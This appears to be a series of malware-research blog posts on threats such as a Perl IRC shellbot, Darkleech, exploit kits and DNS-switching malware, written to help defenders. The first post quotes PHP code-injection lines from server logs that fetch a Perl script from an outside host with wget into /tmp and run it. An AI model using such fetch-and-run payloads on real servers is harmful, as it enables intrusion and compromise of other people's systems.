“Perl IRC Shellbot” malware for servers


Hi 🙂

Recently You maybe saw strange input in server logs…

Something like:

<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>


<?php system(“wget -O /tmp/shz;perl /tmp/shz”); ?>


<?php system(“wget -O /tmp/shz;perl /tmp/shz”); ?>


What does that mean? Well, first of all, Your server potentially vulnerable to the  PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes, that run from /tmp/ folder and with default Apache user.  If there are – You’ve been infected. Take care of it

Now, how exactly this stuff looks like?




VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?

It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂

That’s how it behave:

1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]

2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and  execution

And, since fun is everything in the malware hunting:

One of functions:


🙂 he\she is so exited 🙂

It’s not new player on this game field, but recently he\she back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe


Tags :       

Malware hunt – wildfowl to find


More than twice for the last 24 hours I was asked the non-trivial question:

Where do You find the targets for the malware hunt, if You’re not a  part of the big team, malware researcher or not own a honeynet.

Actually, if You do want to fight a malware, IMHO it is very useful to have a honey-pot system, or, at least, be in security business somehow. It will provide You a non-stop flow of the malicious targets to review. But if  You not, and You still want to help?

Disclamer: All links provided lead to lists of malicious or potentially malicious resources. Do not click there on any link, or don’t run any file, without proper knowledge, env prepared and skills trained.

Well, here are the few links, that  aggregate latest known threats, that You can practice on:

Read more…

JavaScript PluginDetect is in the Past.


Well, I am sick again, alone at home, so looking for something to dig in…

And, as it appear to be, there is always something interesting happened.

If You familiar with ExploitKits, You know, that major feature of traffic filter is – PluginDetect.

It is JS script with huge amount of features, provided by legit and respectful authors.

Main usage for malicious purposes – detect an outdated plug-ins to serve “working” exploits for successful infection of a victim.

Size  – about 45-65 Kb in plain text, in altered\obfuscated mode can reach 110-130 Kb of JavaScript.

It also known to be part of malicious applications,  and triggered respectively. There are products, that emulate JS, provide fake responses to PluginDetect to bypass it successfully.

Well, bottom line – it’s quite a mess to use it for traffic filtering.

But there are other ways, always…

Read more…

Darkleech – malicious Apache mod anti-forensics – client-side.


I wrote about Darkleech last year, and one of questions remain  – among anti-forensics features of it, that seller declared, were:

– frame delivered to unique users only, no frame on repeat. 

So – How it looks like for victim and how implemented?

Since than Linux/Chapro.A was posted in SecLists and  analysed by Kaspersky and ESET.

Afterwards Eric Romang provided some details, that it appear to be version of Darkleech module.

And here it appear again: UnixFreaxJP blog report about massive attack on Japanese segment of Internet.

Well, It’s time to see, is it DarkLeech and how anti-forensics implemented there from client PoV 🙂

Ok. Let’s see on any of servers that in list:

Read more…

Cool Exploit Kit – “We Try harder!”


Heh, when I am sick – it’s time to hunt…


Temperature: 37.8 C

Local Time: 23:00

Mood: [censored]

Test machine: fully updated (pdf, flash, java up to 7.u17)

Live Exploit Kits in list: 5

What we testing:

How dangerous can be surfing for those who follow best practices – at least performing updates.


All behavior among tested Exploit Kits, can be described as:

– If plugin-detect present, than system realize that no vulnerable plugins detected, and

– no exploit served at all [Safe End]

– last available Java exploit served. [Fail]

– If plugin-detect not present, than all available exploits execute and fail.

* Sometimes LibTiff exploit crash the PDF plugin, once Java cause error message appears…

Bottom line – if machine is up to date – well, leave it, there are plenty of easy targets around. 

Except for Cool Exploit Kit. Let me show You some fun stuff there… 

Read more…

Security is everyone’s concern, or why Blacklisting fail.


“Democracy is the worst form of government, except for all those other forms that have been tried from time to time.” (Winston Churchill)

I wrote huge philosophic part here… But then – I realized, that too much ideology already dumped into Net, no need to add.

So – see mr. Churchill quote and add “BlackListing” instead of “Democracy” << this is exactly my point.

And making long story short – in providing protection against malware – blacklisting fail.

Why? Simple.

Blacklisting – “…a blacklist or block list is a basic access control mechanism that allows through all elements (email addresses, users, URLs, etc.), except those explicitly mentioned. Those items on the list are denied access…” (WikiPedia.org)

So, basically, how it should work:

1. Someone detect that IP x.x.x.x or domain badassmalwarehomepage.com is spreading malware, got Exploit Kit installed or some other malicious activity detected

2. IP or domain list added to blacklist – now all software that work with that blacklist, protected from entering this bad site.

3. Internet Safe! (Yeah… )

And how it works now:

1. Malicious IP or domain detected. It take some time to detect new attack, discover all infectors, gather all evidence and prepare to be reported

2. IP\domain reported. There are plenty of different lists, each have it rules. Take some time to re-check and add to list – otherwise it can be used for malicious purposes. 

3. Clients not up to date, lists delivered from time to time, check with list take time and traffic. And bottom line – in fastest way it take 2-3 days to get stuff done. Attacker already got profit, monetized and planning new attack. 

Nothing new for many of You, and as I said – it’d terrible solution, but we dont have another now.

But wait – it even worse 🙂

Malware don’t need to have it’s own IP\domain exposed to victims, or even malware researchers, on any level. Let me show You, how. 

Read more…

Tags :     

Inside “4 horses club” malware >> social details :)


It’s too big for twitter, so I post it as separate blog post.

Some time ago I posted info about ransomware from “4 horses club”. Grab it HERE.

Here is login page of this Aff program for partners (click for bigger pic)


Read more…

“Four Horses Club” – social networking locker malware -[Updated]


This post is about “private” installs\monetize service named “Club Four Horses”:



Actually, this is malicious service “affiliate program” to convert installs on RU zone and Russian-speaking users around the world. Since it localized to RU zone, You may say, that it’s less interesting, but wait 🙂 Implementation is for RU, but idea … 🙂

Read more…

DNS switch as anti-forensics feature in Malware


Recent malware sample, that was grabbed by me (and few other’s, I am certain), perform very interesting thing:

Have a look at code:



It literally change main DNS server on victim machine, and then – perform look-up for it C&C, based on pseudo-random domain.

Interesting, I say 🙂 especially, if You do DNS cache review/passive DNS monitor for living 🙂

As I see, in this particular case, even if malware not succeeded  to switch DNS server, it continue to run.

So, our purpose is to prevent it from doing this.

How? … Group Policy!

Create new, go to User Configuration\Administrative Templates\Network\Network Connections and on “Prohibit access to properties of a LAN connection” policy do Enable

Actually, it prevent any user on computer, even Local Admin, from changing network configuration manually.

In addition – its Recommended to have internal DNS server for LAN and on border router block outgoing DNS traffic from IP’s that different from IP’s of Your internal DNS server.

Additional info about this piece of malware:

Size: 890 Kb

SHA: 72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f

VT: [18/45]: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/

Must see in comments to this file – analysis of binary done by @unixfreaxjp

Similar sample analysis by Conrad Longmore at Dynamoo’s Blog here

Stay Safe




Refresh HTTP header in EK Landing Page, or “200% success attack”


Yesterday,  some brief review of casual threat draw my attention by serving two different Exploit Kits  landing pages thru one include.

Actually, its not new, because there was multiple attempts to increase surface of attack by bot-masters.

Among those methods:

1. Include different injections into hacked server webpages [lame, but worked :)]

2. Use legit or barely-legit TDS (Sutra\SimpleTDS) to route traffic based on internal rules to different Exploit Kits page

3. Using various client-server solutions (scripts with embedded algorithm of traffic forward) with internal capability of routing traffic.

Here is another one 🙂 And it based on very popular in marketing formula “2 in 1”

Look at recent response from Exploit Kit (RedKit in this case)

GET h00p://michellechaso.co.uk/hmiq.htm

Ok, You say, what interesting in this (yeah-yeah, some changes in RedKit landing page, I saw them too 🙂 ) look at HTTP header!

Refresh: 20; URL=h00p://link_2_malware.domain/links/1.php

This is something new (for me, at least).

Let’s look at HTTP_Headers cheat sheet.

So, in simple words it command to browser: stay on this page 20 seconds, then move to next link.

Next link is BlackHole2 EK, that lead us to Kelihos.F variants  droppers.

Technically, it not route traffic between different ExploitKits, it literally infect victim twice:

1. Redkit Drop it’s payload in first 20 seconds.

2. After 20 seconds, victim redirected to BlackHole2 EKand infected again.

Have to say, that it’s common practice, to rent “installs” of malware on infected machines, to increase “return” ratio. But method is new, so be aware and stay protected 🙂

Stay Safe!